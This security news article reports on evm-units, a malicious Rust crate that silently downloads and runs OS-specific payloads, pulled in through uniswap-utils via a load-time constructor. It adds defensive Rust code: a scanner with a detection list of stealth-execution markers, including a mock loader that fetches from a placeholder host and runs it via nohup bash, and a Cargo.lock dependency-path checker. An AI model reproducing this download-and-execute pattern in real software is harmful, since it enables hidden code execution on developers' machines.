A malicious Rust crate masquerading as an Ethereum Virtual Machine (EVM) utility has been caught delivering silent, OS-specific payloads to developers’ machines.
The package, named evm-units and authored by “ablerust,” was hosted on Crates.io for roughly eight months and accumulated over 7,000 all-time downloads before being swiftly removed following a report from the Socket Threat Research Team.
At first glance, evm-units appears to offer a benign helper function, get_evm_version(), returning a plausible EVM version number.
Under the hood, however, this call triggers a cross-platform second-stage loader that fetches and executes a remote payload chosen for the victim's operating system and, on Windows, adjusted according to whether Qihoo 360 antivirus is running.
Cross-platform loader
The malicious behavior begins when get_evm_version() is invoked. The function decodes a hardcoded, base64-encoded string into a remote URL, which is then passed into an async check() function.
This URL, already flagged as malicious by VirusTotal along with the associated payload hash, serves as the delivery point for the second-stage script.
The crate implements three OS-specific check() variants using Rust’s conditional compilation:
On Linux, the malware writes the downloaded script to /tmp/init and executes it in the background via nohup bash with stdin, stdout and stderr all redirected to /dev/null.
No window, log entry or terminal output alerts the victim, while the attacker's script gains full control to run arbitrary commands or install additional payloads.
On macOS, a similar pattern is used: the payload is saved as init in the temp directory, then quietly executed in the background using osascript wrapped in nohup, again with no visible artifacts to the user. This enables a silent AppleScript-based second stage.
On Windows, the payload is dropped as a PowerShell script (init.ps1) in the temp directory. The code then enumerates running processes to detect Qihoo 360 (qhsafetray.exe).
If Qihoo 360 is absent, the malware generates a VBScript that launches the PowerShell script in a hidden window.
Regardless of whether the antivirus is present, it then runs PowerShell with -ExecutionPolicy Bypass and the CREATE_NO_WINDOW process-creation flag, ensuring the script runs without any visible console.
Across all platforms, the HTTP client is built with danger_accept_invalid_certs(true), so the loader accepts any server certificate. The attacker can therefore host the payload behind a self-signed certificate and rotate infrastructure with minimal friction; for defenders, a library crate that disables certificate verification is itself a strong indicator worth flagging in dependency review.
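The loader behaviour described above can be turned into a simple static check. The following is an added example, not code from the article or from the evm-units crate: it decodes base64 string literals found in Rust source and flags those that hide a URL, and reports the stealth and TLS markers named in this section. SAMPLE_SRC is a constructed stand-in that mirrors the described structure; the URL it encodes, the helper names decode_b64, spawn and Client, and the version string are placeholders.

```rust
// Added example (not the article's or the evm-units crate's code): a small
// static scanner applying this section's indicators to Rust source text.

/// Indicator substrings and what each one means, drawn from the loader description.
const MARKERS: &[(&str, &str)] = &[
    ("danger_accept_invalid_certs(true)", "TLS certificate validation disabled"),
    ("nohup", "background execution detached from the terminal"),
    ("osascript", "AppleScript execution on macOS"),
    ("-ExecutionPolicy Bypass", "PowerShell execution policy bypass"),
    ("CREATE_NO_WINDOW", "hidden PowerShell window"),
    ("#[ctor::ctor]", "runs at load time, before main"),
    ("#[cfg(target_os", "OS-specific code path"),
];

/// Constructed sample mimicking the loader shape; helper names and the
/// encoded URL (https://example.invalid/init) are placeholders, not real code.
pub const SAMPLE_SRC: &str = r#"
pub fn get_evm_version() -> &'static str {
    let url = decode_b64("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvaW5pdA==");
    spawn(check(url));
    "0.0.0"
}
#[cfg(target_os = "linux")]
async fn check(url: String) {
    let client = Client::builder().danger_accept_invalid_certs(true).build().unwrap();
    let body = client.get(&url).send().await.unwrap().bytes().await.unwrap();
    std::fs::write("/tmp/init", &body).unwrap();
    Command::new("nohup").args(["bash", "/tmp/init"]).spawn().unwrap();
}
"#;

/// Decode standard base64 (padding optional). Returns None on any non-alphabet byte.
pub fn base64_decode(s: &str) -> Option<Vec<u8>> {
    const ALPHABET: &[u8; 64] =
        b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    let mut out = Vec::new();
    let mut buf: u32 = 0; // holds the most recent 6-bit groups; high bits are discarded
    let mut bits = 0;
    for &c in s.as_bytes() {
        if c == b'=' {
            break;
        }
        let v = ALPHABET.iter().position(|&a| a == c)? as u32;
        buf = (buf << 6) | v;
        bits += 6;
        if bits >= 8 {
            bits -= 8;
            out.push(((buf >> bits) & 0xff) as u8);
        }
    }
    Some(out)
}

/// Collect the contents of every double-quoted literal (no escape handling;
/// base64 never contains quotes or backslashes, which is all we need here).
fn string_literals(src: &str) -> Vec<String> {
    let mut out = Vec::new();
    let mut rest = src;
    while let Some(start) = rest.find('"') {
        let after = &rest[start + 1..];
        match after.find('"') {
            Some(end) => {
                out.push(after[..end].to_string());
                rest = &after[end + 1..];
            }
            None => break,
        }
    }
    out
}

fn looks_base64(s: &str) -> bool {
    s.len() >= 16
        && s.bytes()
            .all(|b| b.is_ascii_alphanumeric() || b == b'+' || b == b'/' || b == b'=')
}

/// Base64 literals in `src` that decode to an http(s) URL.
pub fn decoded_urls(src: &str) -> Vec<String> {
    string_literals(src)
        .into_iter()
        .filter(|s| looks_base64(s))
        .filter_map(|s| base64_decode(&s))
        .filter_map(|bytes| String::from_utf8(bytes).ok())
        .filter(|t| t.starts_with("http://") || t.starts_with("https://"))
        .collect()
}

/// Human-readable reasons for every MARKERS entry present in `src`.
pub fn marker_hits(src: &str) -> Vec<&'static str> {
    MARKERS
        .iter()
        .filter(|(needle, _)| src.contains(*needle))
        .map(|(_, why)| *why)
        .collect()
}

fn main() {
    for url in decoded_urls(SAMPLE_SRC) {
        println!("hidden URL: {url}");
    }
    for why in marker_hits(SAMPLE_SRC) {
        println!("indicator: {why}");
    }
}
```

Run against a vendored crate's src/ directory, the two functions give a quick triage list; the URL decoder is the more useful half, since a hardcoded base64 string that decodes to an address is rarely legitimate in a utility crate. Markers are plain substrings, so an argument list such as "-ExecutionPolicy", "Bypass" written as separate strings would need a second pattern.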
Crypto-focused supply chain compromise
The explicit check for Qihoo 360, a leading Chinese antivirus product with a substantial market share across Asia, points to a likely regional focus and aligns with a cryptocurrency-theft profile.
The combination of EVM-themed utilities, a benign-looking Uniswap helper dependency, and cross-platform loader behavior strongly suggests targeting of crypto developers or infrastructure.
Security teams are urged to treat every open source dependency as potential attack surface, to scan continuously for hidden behaviors such as OS-specific payload downloads, script execution (PowerShell, Bash, AppleScript) and stealthy initialization hooks, and to integrate automated dependency protection into CI/CD pipelines so that malicious crates are blocked before they reach production.
The risk is amplified by the fact that evm-units was not a standalone crate. Another package by the same author, uniswap-utils, appears largely legitimate and has over 7,400 all-time downloads.
However, it depends on evm-units and calls evm_units::get_evm_version() from a function annotated with #[ctor::ctor]. The ctor attribute registers that function as a load-time constructor, so it runs before main in any binary that links uniswap-utils, whether or not the program ever uses the version check. A developer who only wanted the Uniswap helper would still execute the loader, which is what makes this a classic software supply chain compromise.
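Because the malicious crate arrives transitively, the practical question for a team is which of their own packages pull it in. The following is an added example, not code from the article or from either crate: it reads the subset of Cargo.lock syntax that matters (package names and their dependency lists), walks the graph, and reports every chain from a root package to a flagged crate. SAMPLE_LOCK is constructed to mirror the dependency shape described above; the package my-dapp and all version numbers are placeholders, not the real crates' versions.

```rust
// Added example (not the article's or the crates' code): find which packages
// in a Cargo.lock pull a flagged crate into the build, directly or transitively.
use std::collections::{BTreeMap, BTreeSet};

/// Constructed lockfile: "my-dapp" and every version are placeholders.
pub const SAMPLE_LOCK: &str = r#"
[[package]]
name = "ctor"
version = "0.0.0"

[[package]]
name = "evm-units"
version = "0.0.0"

[[package]]
name = "my-dapp"
version = "0.1.0"
dependencies = [
 "uniswap-utils",
]

[[package]]
name = "uniswap-utils"
version = "0.0.0"
dependencies = [
 "ctor",
 "evm-units",
]
"#;

/// Parse [[package]] name and dependencies entries into a name -> deps map.
/// Entries of the form "crate 1.2.3 (source)" are reduced to the crate name.
pub fn parse_lock(text: &str) -> BTreeMap<String, Vec<String>> {
    let mut graph: BTreeMap<String, Vec<String>> = BTreeMap::new();
    let mut current: Option<String> = None;
    let mut in_deps = false;
    for raw in text.lines() {
        let line = raw.trim();
        if line == "[[package]]" {
            current = None;
            in_deps = false;
        } else if let Some(rest) = line.strip_prefix("name = ") {
            let name = rest.trim_matches('"').to_string();
            graph.entry(name.clone()).or_insert_with(Vec::new);
            current = Some(name);
        } else if line.starts_with("dependencies = [") {
            in_deps = !line.ends_with(']'); // a one-line `dependencies = []` has no entries
        } else if in_deps {
            if line == "]" {
                in_deps = false;
            } else if let Some(name) = current.as_ref() {
                let dep = line
                    .trim_matches(',')
                    .trim_matches('"')
                    .split(' ')
                    .next()
                    .unwrap_or("")
                    .to_string();
                graph.get_mut(name).unwrap().push(dep);
            }
        }
    }
    graph
}

/// Every dependency chain from `root` to `flagged` (depth-first, cycle-safe).
pub fn paths_to(graph: &BTreeMap<String, Vec<String>>, root: &str, flagged: &str) -> Vec<Vec<String>> {
    let mut found = Vec::new();
    let mut stack = vec![vec![root.to_string()]];
    while let Some(path) = stack.pop() {
        let last = path.last().unwrap().clone();
        if last == flagged {
            found.push(path);
            continue;
        }
        if let Some(deps) = graph.get(&last) {
            for dep in deps {
                if path.contains(dep) {
                    continue; // already on this chain: skip to avoid looping on cycles
                }
                let mut next = path.clone();
                next.push(dep.clone());
                stack.push(next);
            }
        }
    }
    found
}

/// Packages nothing else depends on (the workspace's roots) whose tree reaches `flagged`.
pub fn roots_pulling(graph: &BTreeMap<String, Vec<String>>, flagged: &str) -> Vec<String> {
    let depended_on: BTreeSet<&String> = graph.values().flatten().collect();
    graph
        .keys()
        .filter(|name| !depended_on.contains(name))
        .filter(|name| !paths_to(graph, name, flagged).is_empty())
        .cloned()
        .collect()
}

fn main() {
    let graph = parse_lock(SAMPLE_LOCK);
    for root in roots_pulling(&graph, "evm-units") {
        for chain in paths_to(&graph, &root, "evm-units") {
            println!("{}", chain.join(" -> "));
        }
    }
}
```

On the constructed lockfile this prints the single chain my-dapp -> uniswap-utils -> evm-units, which is exactly the path a developer who only added the Uniswap helper would never see in their own Cargo.toml. The same walk works against a real Cargo.lock read from disk; `cargo tree -i <crate>` gives an equivalent inverse view when Cargo is available.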
This case underscores the growing sophistication of open source malware, especially within cryptocurrency ecosystems.
A single seemingly innocuous version-check function was enough to conceal a cross-platform loader inside two Rust crates with thousands of downloads between them.
